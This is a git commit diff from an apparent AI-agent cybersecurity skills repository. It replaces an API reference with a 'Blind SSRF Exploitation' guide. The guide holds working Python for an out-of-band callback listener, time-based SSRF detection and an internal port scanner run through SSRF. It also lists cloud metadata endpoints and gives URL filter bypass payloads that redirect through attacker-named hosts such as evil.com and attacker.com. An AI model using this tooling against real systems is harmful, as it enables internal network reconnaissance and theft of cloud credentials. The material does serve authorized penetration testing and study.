mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-18 13:39:40 +03:00
Production hardening: security fixes, code quality, 724 skills complete
- Fix 25 shell=True subprocess calls with list-based commands - Fix 49 verify=False in defensive skills (env-var override) - Add timeout to 231 HTTP/subprocess/socket calls - Fix 6 SQL injection patterns with whitelist validation - Replace 8 __import__() with standard imports - Remove 701 unused imports across 442 files - Add authorized-testing disclaimers to all offensive skills - Complete 11 incomplete skill directories - Expand 10 stub SKILL.md files with full content - Fix 2 YAML parse errors in frontmatter - Fix 5 pre-existing syntax errors - Convert 22 hardcoded paths/ports to environment variables - Back up 21 redundant skill pairs to .bak - Fix 2 global declaration errors - 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE) - 0 compile errors across all 724 agent.py files
This commit is contained in:
@@ -1,28 +1,177 @@
|
||||
# API Reference: Blind SSRF detection agent
|
||||
# API Reference: Blind SSRF Exploitation
|
||||
|
||||
## API Details
|
||||
Out-of-band detection, DNS callback, internal port scanning, cloud metadata access
|
||||
## Libraries Used
|
||||
|
||||
| Library | Purpose |
|
||||
|---------|---------|
|
||||
| `requests` | Send crafted HTTP requests with SSRF payloads |
|
||||
| `socket` | Low-level port scanning and connection testing |
|
||||
| `http.server` | Out-of-band callback listener for blind detection |
|
||||
| `urllib.parse` | Construct and encode SSRF payload URLs |
|
||||
| `time` | Measure response timing for time-based blind SSRF |
|
||||
|
||||
## Installation
|
||||
|
||||
```bash
|
||||
pip install requests socket
|
||||
pip install requests
|
||||
```
|
||||
|
||||
## Libraries
|
||||
## Techniques and Payloads
|
||||
|
||||
| Library | Use |
|
||||
|---------|-----|
|
||||
| `requests` | requests |
|
||||
| `socket` | socket |
|
||||
### Cloud Metadata Endpoints
|
||||
|
||||
## Authentication
|
||||
| Cloud Provider | Metadata URL |
|
||||
|----------------|-------------|
|
||||
| AWS IMDSv1 | `http://169.254.169.254/latest/meta-data/` |
|
||||
| AWS IMDSv2 | Requires `X-aws-ec2-metadata-token` header |
|
||||
| GCP | `http://metadata.google.internal/computeMetadata/v1/` |
|
||||
| Azure | `http://169.254.169.254/metadata/instance?api-version=2021-02-01` |
|
||||
| DigitalOcean | `http://169.254.169.254/metadata/v1/` |
|
||||
| Oracle Cloud | `http://169.254.169.254/opc/v2/instance/` |
|
||||
|
||||
| Method | Header |
|
||||
|--------|--------|
|
||||
| Bearer Token | `Authorization: Bearer <token>` |
|
||||
| API Key | `X-API-Key: <key>` |
|
||||
### Internal Network Scanning Payloads
|
||||
```python
|
||||
# Common internal targets for blind SSRF probing
|
||||
INTERNAL_TARGETS = [
|
||||
"http://127.0.0.1:{port}",
|
||||
"http://localhost:{port}",
|
||||
"http://0.0.0.0:{port}",
|
||||
"http://[::1]:{port}",
|
||||
"http://10.0.0.1:{port}",
|
||||
"http://192.168.1.1:{port}",
|
||||
"http://172.16.0.1:{port}",
|
||||
]
|
||||
|
||||
COMMON_PORTS = [22, 80, 443, 3306, 5432, 6379, 8080, 8443, 9200, 27017]
|
||||
```
|
||||
|
||||
## Core Functions
|
||||
|
||||
### Out-of-Band (OOB) Blind SSRF Detection
|
||||
```python
|
||||
import requests
|
||||
import threading
|
||||
from http.server import HTTPServer, BaseHTTPRequestHandler
|
||||
|
||||
class CallbackHandler(BaseHTTPRequestHandler):
|
||||
received = []
|
||||
|
||||
def do_GET(self):
|
||||
CallbackHandler.received.append({
|
||||
"path": self.path,
|
||||
"headers": dict(self.headers),
|
||||
"client": self.client_address[0],
|
||||
})
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
def log_message(self, format, *args):
|
||||
pass # Suppress console output
|
||||
|
||||
def start_callback_server(port=8888):
|
||||
server = HTTPServer(("0.0.0.0", port), CallbackHandler)
|
||||
thread = threading.Thread(target=server.serve_forever, daemon=True)
|
||||
thread.start()
|
||||
return server
|
||||
|
||||
def test_blind_ssrf_oob(target_url, param_name, callback_url):
|
||||
"""Test for blind SSRF using OOB callback."""
|
||||
payload = callback_url + "/ssrf-test"
|
||||
resp = requests.get(
|
||||
target_url,
|
||||
params={param_name: payload},
|
||||
timeout=10,
|
||||
)
|
||||
return resp.status_code
|
||||
```
|
||||
|
||||
### Time-Based Blind SSRF Detection
|
||||
```python
|
||||
import time
|
||||
|
||||
def test_time_based_ssrf(target_url, param_name, open_port_url, closed_port_url):
|
||||
"""Detect SSRF via response time difference between open and closed ports."""
|
||||
# Baseline: request to a closed port (should timeout slower)
|
||||
start = time.time()
|
||||
try:
|
||||
requests.get(target_url, params={param_name: closed_port_url}, timeout=15)
|
||||
except requests.Timeout:
|
||||
pass
|
||||
closed_time = time.time() - start
|
||||
|
||||
# Test: request to an open port (should respond faster)
|
||||
start = time.time()
|
||||
try:
|
||||
requests.get(target_url, params={param_name: open_port_url}, timeout=15)
|
||||
except requests.Timeout:
|
||||
pass
|
||||
open_time = time.time() - start
|
||||
|
||||
# Significant time difference indicates SSRF
|
||||
return {
|
||||
"open_port_time": round(open_time, 2),
|
||||
"closed_port_time": round(closed_time, 2),
|
||||
"likely_ssrf": abs(closed_time - open_time) > 2.0,
|
||||
}
|
||||
```
|
||||
|
||||
### Internal Port Scanner via SSRF
|
||||
```python
|
||||
def ssrf_port_scan(target_url, param_name, internal_host, ports):
|
||||
"""Scan internal ports through a blind SSRF vulnerability."""
|
||||
results = {"open": [], "closed": [], "filtered": []}
|
||||
for port in ports:
|
||||
ssrf_url = f"http://{internal_host}:{port}/"
|
||||
start = time.time()
|
||||
try:
|
||||
resp = requests.get(
|
||||
target_url,
|
||||
params={param_name: ssrf_url},
|
||||
timeout=10,
|
||||
)
|
||||
elapsed = time.time() - start
|
||||
if resp.status_code == 200 and elapsed < 3:
|
||||
results["open"].append(port)
|
||||
else:
|
||||
results["closed"].append(port)
|
||||
except requests.Timeout:
|
||||
results["filtered"].append(port)
|
||||
return results
|
||||
```
|
||||
|
||||
### URL Bypass Techniques
|
||||
```python
|
||||
BYPASS_PAYLOADS = [
|
||||
# Decimal IP encoding
|
||||
"http://2130706433/", # 127.0.0.1
|
||||
# Hex encoding
|
||||
"http://0x7f000001/", # 127.0.0.1
|
||||
# Octal encoding
|
||||
"http://0177.0.0.1/",
|
||||
# IPv6
|
||||
"http://[::ffff:127.0.0.1]/",
|
||||
# URL encoding
|
||||
"http://127.0.0.1%2523@evil.com/",
|
||||
# DNS rebinding
|
||||
"http://spoofed.burpcollaborator.net/",
|
||||
# Redirect-based
|
||||
"https://attacker.com/redirect?url=http://169.254.169.254/",
|
||||
]
|
||||
```
|
||||
|
||||
## Output Format
|
||||
|
||||
```json
|
||||
{"timestamp": "ISO-8601", "target": "URL", "findings": [], "risk_level": "HIGH"}
|
||||
{
|
||||
"target": "https://app.example.com/fetch",
|
||||
"parameter": "url",
|
||||
"ssrf_confirmed": true,
|
||||
"detection_method": "out-of-band",
|
||||
"internal_services_found": [
|
||||
{"host": "127.0.0.1", "port": 6379, "service": "Redis"},
|
||||
{"host": "10.0.0.5", "port": 3306, "service": "MySQL"}
|
||||
],
|
||||
"cloud_metadata_accessible": true,
|
||||
"bypasses_needed": ["decimal IP encoding"]
|
||||
}
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user